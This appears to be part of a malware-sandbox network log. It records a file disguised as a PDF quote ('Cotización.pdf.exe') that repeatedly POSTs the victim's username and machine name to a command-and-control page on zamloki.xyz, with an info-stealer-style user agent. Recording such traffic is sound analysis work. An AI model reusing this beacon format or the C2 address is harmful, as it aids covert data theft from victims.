                                    Jul 21, 2021 17:02:02.164361000 CEST1346OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:02.407171011 CEST1346INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GI%2FZ27EUIHo%2BfgUuLq%2FcylVlK60F0ASnvMeUE8HI66GIP5D0RdIieZ3R8usvJze%2BN2nz43lCX%2F%2F4cPeITzYSoDsTwCt9AJW%2FtSgNmK%2FZqfK345Au9mgADDVJCpWCyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ed77fc04ece-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    24192.168.2.349753172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:02.722496033 CEST1347OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:02.742388010 CEST1347OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:02.988822937 CEST1348INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OsxdqwjfVtWHtwANmu4WKnr1Tt1Iz3GzGlRtzwSb6b%2FBdbCAAFNpFHD3kGTZrHbhhqcN1oYJifN0%2FRNQ06iELAoBCdBEW4VoNRxPoGJS99EOGDMsneUdCRwafqvvYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254edb18f94ece-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    25192.168.2.349754104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:03.283216000 CEST1349OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:03.301315069 CEST1349OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:03.883820057 CEST1350INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xbcpUjf71ELZopu%2FW8tRGwIKINFxeT05JSguRv4z1w22y8VwfueWeDEyX3NN5hsWrP%2FJvgcFbeGLqYDOj8eY1LhfjB2SBr7rfCRsI4uQDRht6Zv1a1zK2quBBiS8Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ede9ed6bf19-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    26192.168.2.349755104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:04.137002945 CEST1351OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:04.156979084 CEST1351OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:04.457256079 CEST1352INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zTOGE0LVoWL29BcvyRmpF%2FMNBp2hPoy40qpK86g9rbvsRMRnITeINehnYz3qAoeEh%2B%2BzM8pPfGQSenY%2F2XOIqKSdApt6Sy1p2lpZigTERjOuwXvBpKHwjSO8LyKIjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ee3ee9e4e32-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    27192.168.2.349756172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:04.701324940 CEST1353OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:04.719463110 CEST1353OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:04.987874985 CEST1354INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JuXRrhu5WUoj4CSPSVvhptVxeQxz%2ByL5i%2BOvK7kJCXplRc3KpeSkfBAhV1HIj39OPDZYOPMDhARkcXA4CnQo2KdJVXLBj3VSPjyj%2Fv6TFQYHfafdriZ54chOhsu6ew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ee77ce34e49-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    28192.168.2.349757104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:05.261212111 CEST1355OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:05.281430006 CEST1355OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:05.545480013 CEST1356INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QOPoVGf3BWs%2B0wz8dc4a1r9g%2B%2F66kA%2Bl%2BEXga1KYFuFqpE%2FkwboT0dmKpLp4b5K54jahzh9Q2Jr8eeF4Gna0idLCwXcY6R2867OFWUuUcZv%2FbLrLo1O6z%2B2BH5F72w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eeaf98a97c6-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    29192.168.2.349758172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:05.829794884 CEST1356OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:05.847943068 CEST1357OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:06.098681927 CEST1359INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pB8W4LFbf7fBjYSBwa2GsSqK39rwtaMwSteCL%2FVR9rt81a4nFB0BzJGwOt20T1GoTE3iN1%2FXDj3633PqNsS2AszUAwIzKzHun3joUqlXB7Y13st8Jy60CjltOgBQoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eee8b564a56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.349730104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:49.519073009 CEST1280OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:49.539033890 CEST1281OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:49.794929028 CEST1281INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dBHolTJMy%2F4M1XaDJCysyWWrKLFVeZ%2Fj%2FUH%2Bf8IbSIbY2IfhL8LswcQD2TM0MN%2BlLS8Hq0Lbr0Tk9L2B2V%2BLMfNATVgzhZx3B4r8q3zb1TuoI2N6LEhnvmY9gK3CVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e8898844a7f-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    30192.168.2.349762172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:06.367161036 CEST1414OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:06.387041092 CEST1414OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:06.655983925 CEST1415INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9g1vjNqEee5FCU9BItfe5cYHkWAGIXdHar890P%2BDdlCjLLoNvkTU1kbADEkoETQnrDzXkvKXa3u1J1XsfS61OZ9rhf80BOJ3oVHAE78ENidDu%2B0JAjUpaPgGAlsQlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ef1dcc93128-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    31192.168.2.349763104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:06.914597034 CEST1416OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:06.932962894 CEST1416OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:07.206824064 CEST1417INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=29TVUbuseyMGsyk9jp5E8kZPVhZvXtdoHPtPvHyeGG%2BCZMGPsAqQ%2FaoI8%2Fcvv1PIYtMr%2BwZmemLmC9hkF0bH3mQw0AWZRzMFDeBoyLDYGQboJnjx9OjFtLP8fpEyDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ef5492a2bca-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    32192.168.2.349764104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:07.480763912 CEST1418OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:07.500653982 CEST1418OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:07.754492998 CEST1419INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8bDeYGjy4rA%2BmDL6ibOR6nIu%2FVqhvZH5b67xyOZRUfEh1lIT774tH4wCpkjvzcihDV5DoL%2FjB9Qm0gR2f4e2ZqVDGYpBJFovQDV%2FyEFBe20U4%2FREYAGgmKD3C8MSPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ef8dd320625-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    33192.168.2.349765172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:08.015722990 CEST1419OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:08.033787012 CEST1420OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:08.327749014 CEST1420INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ulhNvgxWWxZ%2BNWYoVWh%2FBiPLSYTGBP9LsVK2JJKOUShJjzheOm87irlEei2Fr0O4cwQ2%2BWa%2FrIlDawoRAgsYcBjKIROZVQ%2B6BiVyGaFFZ3t4SnTe8N93JE7nbSYo7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254efc3d4e5364-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    34192.168.2.349766104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:08.645421982 CEST1421OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:08.667253017 CEST1422OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:08.915510893 CEST1422INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6bjHUGsx3EuMuqaqR%2Bu3awH5%2BJcDauqoyR0Fcm73Q57doOx2pPdWyHCoh0RqRMPPfgIcv9p9TcsgR7ca46Y78wT0SZFQQXnD9r8heeLSxdd3k14W6NNUGPXiGD79oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f001b64dfa9-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    35192.168.2.349767172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:09.177828074 CEST1423OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:09.195965052 CEST1423OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:09.436971903 CEST1424INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0JcspaDQ4RRkDmAtBOErdYx4ggqfAzt5d7F0s5G0w1Ti%2FSlbF7EGxXhAQQEw5qjGIYC%2FFKSSzV7gFMo08b0dzp13lSiZCK%2Fdgs9EsCQvcyRYqMUC%2FfzcTTOmOztJYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f03691405b3-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
